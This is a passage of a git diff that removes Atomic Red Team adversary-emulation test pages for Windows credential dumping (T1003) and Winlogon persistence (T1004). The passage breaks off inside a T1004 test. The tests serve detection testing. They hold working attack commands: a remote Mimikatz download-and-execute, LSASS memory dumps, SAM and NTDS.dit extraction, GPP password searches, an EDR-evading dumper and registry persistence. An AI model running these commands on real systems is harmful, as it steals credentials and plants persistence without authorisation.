-* Using the in-built Windows tool, ntdsutil.exe
-* Invoke-NinjaCopy
-
-#### Group Policy Preference (GPP) Files
-
-Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
-
-These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
-
-The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
-
-* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
-* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
-* gpprefdecrypt.py
-
-Notes:
-On the SYSVOL share, the following can be used to enumerate potential XML files.
-dir /s * .xml
-
-#### Service Principal Names (SPNs)
-
-See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
-
-#### Plaintext Credentials
-
-After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
-
-SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
-
-The following SSPs can be used to access credentials:
-
-Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
-Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
-Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
-CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
- 
-The following tools can be used to enumerate credentials:
-
-* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
-* [Mimikatz](https://attack.mitre.org/software/S0002)
-
-As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
-
-For example, on the target host use procdump:
-
-* <code>procdump -ma lsass.exe lsass_dump</code>
-
-Locally, mimikatz can be run:
-
-* <code>sekurlsa::Minidump lsassdump.dmp</code>
-* <code>sekurlsa::logonPasswords</code>
-
-#### DCSync
-
-DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
-
-### Linux
-
-#### Proc filesystem
-
-The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
-
-- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
-
-- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)
-
-- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
-
-- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
-
-- [Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-6---dump-lsassexe-memory-using-comsvcsdll)
-
-- [Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-7---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
-
-- [Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-8---dump-lsassexe-memory-using-windows-task-manager)
-
-- [Atomic Test #9 - Offline Credential Theft With Mimikatz](#atomic-test-9---offline-credential-theft-with-mimikatz)
-
-- [Atomic Test #10 - Dump Active Directory Database with NTDSUtil](#atomic-test-10---dump-active-directory-database-with-ntdsutil)
-
-- [Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-11---create-volume-shadow-copy-with-ntdsdit)
-
-- [Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-12---copy-ntdsdit-from-volume-shadow-copy)
-
-- [Atomic Test #13 - GPP Passwords (findstr)](#atomic-test-13---gpp-passwords-findstr)
-
-- [Atomic Test #14 - GPP Passwords (Get-GPPPassword)](#atomic-test-14---gpp-passwords-get-gpppassword)
-
-- [Atomic Test #15 - LSASS read with pypykatz](#atomic-test-15---lsass-read-with-pypykatz)
-
-- [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz)
-
-
-<br/>
-
-## Atomic Test #1 - Powershell Mimikatz
-Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
-
-If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
-
-Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. 
-Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Gsecdump
-Dump credentials from memory using Gsecdump.
-
-Upon successful execution, you should see domain\username's following by two 32 characters hashes.
-
-If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. 
-You will receive only error output if you do not run this test from an elevated context (run as administrator)
-
-If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
-| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
-| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{gsecdump_exe} -a
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
-IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
-if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
-  Move-Item $binpath "#{gsecdump_exe}"
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Windows Credential Editor
-Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
-
-Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
-
-If you see no output it is likely that execution was blocked by Anti-Virus. 
-
-If you see a message saying "wce.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install Windows Credential Editor first.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
-| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;wce.exe|
-| wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
-| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{wce_exe} -o #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del "#{output_file}" >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
-if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-  Expand-Archive $zippath $parentpath\wce -Force
-  Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-  Remove-Item $zippath, $parentpath\wce -Recurse
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Registry dump of SAM, creds, and secrets
-Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
-via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
-
-Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg save HKLM\sam %temp%\sam
-reg save HKLM\system %temp%\system
-reg save HKLM\security %temp%\security
-```
-
-#### Cleanup Commands:
-```cmd
-del %temp%\sam >nul 2> nul
-del %temp%\system >nul 2> nul
-del %temp%\security >nul 2> nul
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
-ProcDump.
-
-Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
-
-If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
-| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;procdump.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del "#{output_file}" >nul 2> nul
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
-Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
-New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
-Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
-
-Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
-https://github.com/outflanknl/Dumpert
-https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
-Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
-
-If you see a message saying "The system cannot find the path specified.", try using the  get-prereq_commands to download the  tool first.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;Outflank-Dumpert.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{dumpert_exe}
-```
-
-#### Cleanup Commands:
-```cmd
-del C:\windows\temp\dumpert.dmp >nul 2> nul
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
-Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
-Manager and administrative permissions.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Run it with these steps! 
-1. Open Task Manager:
-  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
-  on the task bar and selecting "Task Manager".
-
-2. Select lsass.exe:
-  If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
-  and select it for manipulation.
-
-3. Dump lsass.exe memory:
-  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Offline Credential Theft With Mimikatz
-The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
-Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003&#92;bin&#92;mimikatz.exe|
-| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
-Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
-New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
-Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
-```
-##### Description: Lsass dump must exist at specified location (#{input_file})
-##### Check Prereq Commands:
-```powershell
-cmd /c "if not exist #{input_file} (exit /b 1)" 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Dump Active Directory Database with NTDSUtil
-This test is intended to be run on a domain Controller.
-
-The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
-uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
-subsequent domain controllers without the need of network-based replication.
-
-Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
-```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
-```
-##### Get Prereq Commands:
-```cmd
-echo Sorry, Promoting this machine to a Domain Controller must be done manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit
-This test is intended to be run on a domain Controller.
-
-The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon) | String | C:|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-vssadmin.exe create shadow /for=#{drive_letter}
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
-```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
-```
-##### Get Prereq Commands:
-```cmd
-echo Sorry, Promoting this machine to a Domain Controller must be done manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy
-This test is intended to be run on a domain Controller.
-
-The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
-
-This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-A successful test also requires the export of the SYSTEM Registry hive. 
-This test must be executed on a Windows Domain Controller.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
-| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
-copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
-reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
-```
-
-#### Cleanup Commands:
-```cmd
-del "#{extract_path}\ntds.dit"        >nul 2> nul
-del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
-del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Target must be a Domain Controller
-##### Check Prereq Commands:
-```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
-```
-##### Get Prereq Commands:
-```cmd
-echo Sorry, Promoting this machine to a Domain Controller must be done manually
-```
-##### Description: Volume shadow copy must exist
-##### Check Prereq Commands:
-```cmd
-if not exist #{vsc_name} (exit /b 1) 
-```
-##### Get Prereq Commands:
-```cmd
-echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
-```
-##### Description: Extract path must exist
-##### Check Prereq Commands:
-```cmd
-if not exist #{extract_path} (exit /b 1) 
-```
-##### Get Prereq Commands:
-```cmd
-mkdir #{extract_path}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - GPP Passwords (findstr)
-Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-findstr /S cpassword %logonserver%\sysvol\*.xml
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Computer must be domain joined
-##### Check Prereq Commands:
-```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host Joining this computer to a domain must be done manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - GPP Passwords (Get-GPPPassword)
-Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
-This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
-The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
-
-Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found".
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder&#92;T1003&#92;src&#92;Get-GPPPassword.ps1|
-| gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-. #{gpp_script_path}
-Get-GPPPassword -Verbose
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
-##### Check Prereq Commands:
-```powershell
-if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
-Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
-```
-##### Description: Computer must be domain joined
-##### Check Prereq Commands:
-```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host Joining this computer to a domain must be done manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #15 - LSASS read with pypykatz
-Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
-
-Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
-
-Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
-  
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-pypykatz live lsa
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Computer must have python 3 installed
-##### Check Prereq Commands:
-```powershell
-if (python --version) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-echo "Python 3 must be installed manually"
-```
-##### Description: Computer must have pip installed
-##### Check Prereq Commands:
-```powershell
-if (pip3 -V) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-echo "PIP must be installed manually"
-```
-##### Description: pypykatz must be installed and part of PATH
-##### Check Prereq Commands:
-```powershell
-if (cmd /c pypykatz -h) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-pip3 install pypykatz
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #16 - Registry parse with pypykatz
-Parses registry hives to obtain stored credentials
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-pypykatz live registry
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Computer must have python 3 installed
-##### Check Prereq Commands:
-```powershell
-if (python --version) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-echo "Python 3 must be installed manually"
-```
-##### Description: Computer must have pip installed
-##### Check Prereq Commands:
-```powershell
-if (pip3 -V) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-echo "PIP must be installed manually"
-```
-##### Description: pypykatz must be installed and part of PATH
-##### Check Prereq Commands:
-```powershell
-if (cmd /c pypykatz -h) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-pip3 install pypykatz
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1004.md b/Atomic_Threat_Coverage/Triggers/T1004.md
deleted file mode 100644
index 27df95f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1004.md
+++ /dev/null
@@ -1,127 +0,0 @@
-# T1004 - Winlogon Helper DLL
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
-<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
-
-Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
-
-* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
-* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
-* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
-
-Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
-
-- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
-
-- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
-PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
-
-Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
-PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
-
-Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
